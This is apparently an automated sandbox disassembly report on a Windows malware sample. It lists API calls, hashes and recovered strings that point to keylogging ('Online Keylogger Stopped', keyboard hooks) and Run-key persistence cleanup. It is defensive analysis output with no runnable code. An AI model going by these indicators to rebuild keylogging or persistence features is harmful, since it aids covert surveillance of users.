                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LocalTime
                                                                                                                                                                                                                                                                                                                              • String ID: | $%02i:%02i:%02i:%03i
                                                                                                                                                                                                                                                                                                                              • API String ID: 481472006-2430845779
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 365bcbfee3d565b8a38241e00ebfd453cc18cd437c04f7141d28498a3db00075
                                                                                                                                                                                                                                                                                                                              • Instruction ID: f196d4ed1927782274832919bda13c77b2b6189c6c06a517aeeeb96a95a688aa
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 365bcbfee3d565b8a38241e00ebfd453cc18cd437c04f7141d28498a3db00075
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81114C725082045AC704EBA5D8568AF73E8EB94708F10053FFC85931E1EF38DA84C69E
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412612
                                                                                                                                                                                                                                                                                                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00412648
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: QueryValue
                                                                                                                                                                                                                                                                                                                              • String ID: TUF
                                                                                                                                                                                                                                                                                                                              • API String ID: 3660427363-3431404234
                                                                                                                                                                                                                                                                                                                              • Opcode ID: b605368632a8b95eca07563d70a4edea7f82eb0f70db9b2c6bca89800abb1ac5
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c735b93b908d9d71aa6a4d05a3740b5a2597980304af3aa5722c76a25f50973a
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b605368632a8b95eca07563d70a4edea7f82eb0f70db9b2c6bca89800abb1ac5
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B201A2B6A00108BFEB04EB95DD46EFFBABDEF44240F10007AF901E2251E6B4AF009664
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • PathFileExistsW.SHLWAPI(00000000), ref: 00419EBE
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                                                              • String ID: TUF$alarm.wav
                                                                                                                                                                                                                                                                                                                              • API String ID: 1174141254-147985980
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 51684589369e3c673a644f66e684fb8c42cd93cc6fa80ce3e9dee982dc441a3d
                                                                                                                                                                                                                                                                                                                              • Instruction ID: dd13df65ec224498850e23f6f848d4e774319f78d5db457f3497a795ed38963e
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 51684589369e3c673a644f66e684fb8c42cd93cc6fa80ce3e9dee982dc441a3d
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F301927060420166C604B676D866AEE77418BC1719F50413FF88A966E2EF7C9EC6C2CF
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,Offline Keylogger Started,?), ref: 0040A884
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 0040A7CA
                                                                                                                                                                                                                                                                                                                              • UnhookWindowsHookEx.USER32 ref: 0040A7DD
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LocalTime$CloseHandleHookUnhookWindowswsprintf
                                                                                                                                                                                                                                                                                                                              • String ID: Online Keylogger Stopped
                                                                                                                                                                                                                                                                                                                              • API String ID: 1623830855-1496645233
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 2213c85c886e4de9ccc3d5eff7c09abaddf972785ca54a1a8fe73a7c66abb7d9
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9ca866747e1af720c58b6b078daeda0145c7b5fd7bd766bf2ea1503866da158c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2213c85c886e4de9ccc3d5eff7c09abaddf972785ca54a1a8fe73a7c66abb7d9
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8101D431A043019BDB25BB35C80B7AEBBB19B45315F40407FE481275D2EB7999A6C3DB
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02832903
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 028335D2: RaiseException.KERNEL32(?,?,?,02832925,00000000,00000000,00000000,?,?,?,?,?,02832925,?,028421B8), ref: 02833632
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 02832920
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4572333213.0000000002831000.00000040.00001000.00020000.00000000.sdmp, Offset: 02830000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572288883.0000000002830000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4572333213.0000000002846000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_2830000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                                              • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 432f88af0f919fddebc06acbbf9b6a17a1cd102ccfeab3ecec1aed4613a3ad7e
                                                                                                                                                                                                                                                                                                                              • Instruction ID: 9412cc027a19e5fcbd4caa02f289d4ab501f770107510977ac0e2317966c604f
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 432f88af0f919fddebc06acbbf9b6a17a1cd102ccfeab3ecec1aed4613a3ad7e
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0BF0C23CA0430C778F06B6ADEC449ADB76DAF00754B508170EE29D6198EF71EE26C9C2
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: GetLastError.KERNEL32(?,?,0043932C,?,?,?,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B), ref: 00446ED3
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _free.LIBCMT ref: 00446F06
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: SetLastError.KERNEL32(00000000,0043E4DD,?,?,?,?,00000000,?,?,0042CE63,0000003B,?,00000041,00000000,00000000), ref: 00446F47
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 00446ECF: _abort.LIBCMT ref: 00446F4D
                                                                                                                                                                                                                                                                                                                              • _abort.LIBCMT ref: 0044DE29
                                                                                                                                                                                                                                                                                                                              • _free.LIBCMT ref: 0044DE5D
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ErrorLast_abort_free
                                                                                                                                                                                                                                                                                                                              • String ID: 09~
                                                                                                                                                                                                                                                                                                                              • API String ID: 289325740-1645473027
                                                                                                                                                                                                                                                                                                                              • Opcode ID: cba5e3b893efa1f4c196fd8b6ab646112b65b39245522f8e75cb99aab8fd3b38
                                                                                                                                                                                                                                                                                                                              • Instruction ID: c3d52a826ce14ac6b731adabf6d8033b48d69a437140057254d59f729b4b779c
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: cba5e3b893efa1f4c196fd8b6ab646112b65b39245522f8e75cb99aab8fd3b38
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB01A1B1D02E21DBEB71AF69980121EB3B0AF54B20B25011BE9546B381C73C6942CFCE
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • IsValidLocale.KERNEL32(00000000,z=D,00000000,00000001,?,?,00443D7A,?,?,?,?,00000004), ref: 004477EC
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: LocaleValid
                                                                                                                                                                                                                                                                                                                              • String ID: IsValidLocaleName$z=D
                                                                                                                                                                                                                                                                                                                              • API String ID: 1901932003-2791046955
                                                                                                                                                                                                                                                                                                                              • Opcode ID: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                                                                                                              • Instruction ID: b87742f2873dd73c0a7d5aade023b210d3410e3306d67f57874115e62e910f2b
                                                                                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 34048a5779238571e042b1bd9c847fb843bb8be3ea41a6d98ed8d0d1ded4c140
                                                                                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 72F0E930A45318F7DA106B659C06F5E7B54CF05711F50807BFD046A283CE796D0285DC
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              • Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: H_prolog
• String ID: T=G$T=G
• API String ID: 3519838083-3732185208
• Opcode ID: 982f7bd813af9d9c889e4a2d4ec4ec1ff60f17d6450c8448ea392ea3d49e0b1a
• Instruction ID: f0e76400c825ed045590d0aed9209fb7c3a86c2d0af9b05bbbbea7315d156e8c
• Opcode Fuzzy Hash: 982f7bd813af9d9c889e4a2d4ec4ec1ff60f17d6450c8448ea392ea3d49e0b1a
• Instruction Fuzzy Hash: 77F0E971A00221ABC714BB65C80569EB774EF4136DF10827FB416B72E1CBBD5D04D65D
APIs
• GetKeyState.USER32(00000011), ref: 0040AD5B
  • Part of subcall function 00409B10: GetForegroundWindow.USER32 ref: 00409B3F
  • Part of subcall function 00409B10: GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
  • Part of subcall function 00409B10: GetKeyboardLayout.USER32(00000000), ref: 00409B52
  • Part of subcall function 00409B10: GetKeyState.USER32(00000010), ref: 00409B5C
  • Part of subcall function 00409B10: GetKeyboardState.USER32(?), ref: 00409B67
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
  • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
• String ID: [AltL]$[AltR]
• API String ID: 2738857842-2658077756
• Opcode ID: c0c7afa873da1f73a1fe5c81c8cf2f93ed3ee5fe4ba19fbc98e8737b6bcc32b1
• Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
• Opcode Fuzzy Hash: c0c7afa873da1f73a1fe5c81c8cf2f93ed3ee5fe4ba19fbc98e8737b6bcc32b1
• Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
APIs
• _free.LIBCMT ref: 00448835
  • Part of subcall function 00446AD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?), ref: 00446AEB
  • Part of subcall function 00446AD5: GetLastError.KERNEL32(?,?,0044FA60,?,00000000,?,00000000,?,0044FD04,?,00000007,?,?,00450215,?,?), ref: 00446AFD
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID: `@$`@
• API String ID: 1353095263-20545824
• Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
• Instruction ID: fd413ccac38a9f67c3de8d393d9e933a11814297f80871467d1a397382efd299
• Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
• Instruction Fuzzy Hash: 4DE06D371006059F8720DE6DD400A86B7E5EF95720720852AE89DE3710D731E812CB40
APIs
• GetKeyState.USER32(00000012), ref: 0040ADB5
Strings
Memory Dump Source
• Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
Yara matches
Similarity
• API ID: State
• String ID: [CtrlL]$[CtrlR]
• API String ID: 1649606143-2446555240
• Opcode ID: 017dd08ea117ef9949e136069607eb1ceb0e9bbc0bd8767c02a12888e350b825
• Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
• Opcode Fuzzy Hash: 017dd08ea117ef9949e136069607eb1ceb0e9bbc0bd8767c02a12888e350b825
• Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040BFB2,00000000,004742E0,004742F8,?,pth_unenc), ref: 00412988
                                                                                                                                                                                                                                                                                                                              • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00412998
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: DeleteOpenValue
                                                                                                                                                                                                                                                                                                                              • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                                                                                                                                                                                                                                                                                              • API String ID: 2654517830-1051519024
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000,?,pth_unenc), ref: 0040AF84
                                                                                                                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(00000000,?,pth_unenc), ref: 0040AFAF
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4563361891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.4563318670.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4564159338.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000470000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4565002862.0000000000473000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.4566159973.0000000000476000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: DeleteDirectoryFileRemove
                                                                                                                                                                                                                                                                                                                              • String ID: pth_unenc
                                                                                                                                                                                                                                                                                                                              • API String ID: 3325800564-4028850238
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 1000A5D2
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000A547: std::exception::exception.LIBCONCRT ref: 1000A554
                                                                                                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 1000A5E0
                                                                                                                                                                                                                                                                                                                                • Part of subcall function 1000C804: RaiseException.KERNEL32(?,?,1000A5C5,?,?,?,?,?,?,?,?,1000A5C5,?,10029888,?), ref: 1000C863
                                                                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                                                                              • Source File: 00000000.00000002.4574030040.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000000.00000002.4574002401.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.000000001002B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010030000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574030040.0000000010032000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.4574230284.0000000010033000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_10000000_17360626254f6ab0798f0d71fe81e2d058a575b873a7088f40695d7fd8031d0961d3a3.jbxd
                                                                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrowstd::exception::exceptionstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                                                                              • String ID: Unknown exception
                                                                                                                                                                                                                                                                                                                              • API String ID: 1586462112-410509341
                                                                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                                                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                                                                                                                                                                                                                                              Strings
